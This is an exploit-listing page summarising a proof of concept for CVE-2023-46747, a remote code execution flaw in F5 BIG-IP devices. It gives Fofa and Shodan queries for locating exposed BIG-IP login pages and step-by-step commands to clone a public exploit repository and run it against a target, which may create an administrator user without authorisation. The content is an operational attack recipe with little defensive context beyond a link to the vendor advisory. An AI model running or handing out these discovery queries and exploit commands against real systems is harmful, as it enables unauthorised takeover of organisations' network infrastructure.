Share
## https://sploitus.com/exploit?id=2B32DB9F-D247-5ED8-8FD0-E0270614E172
# CVE-2023-46747-RCE-poc Vulnerability Summary

## Detection Methods
- **Fofa**: `(title="BIG-IP®" || icon_hash="-335242539")`
- **Shodan**: `title:"BIG-IP®"`

## Affected Versions
Refer to: [F5 Security Advisory](https://my.f5.com/manage/s/article/K000137353)

## Exploit Steps
1. Clone the exploit repository:
   ```
   git clone https://github.com/W01fh4cker/CVE-2023-46747-RCE.git
   cd CVE-2023-46747-RCE
   pip install -r requirements.txt
   python poc.py -u https://target-ip
   ```
2. The exploit may successfully create a new user without authorization.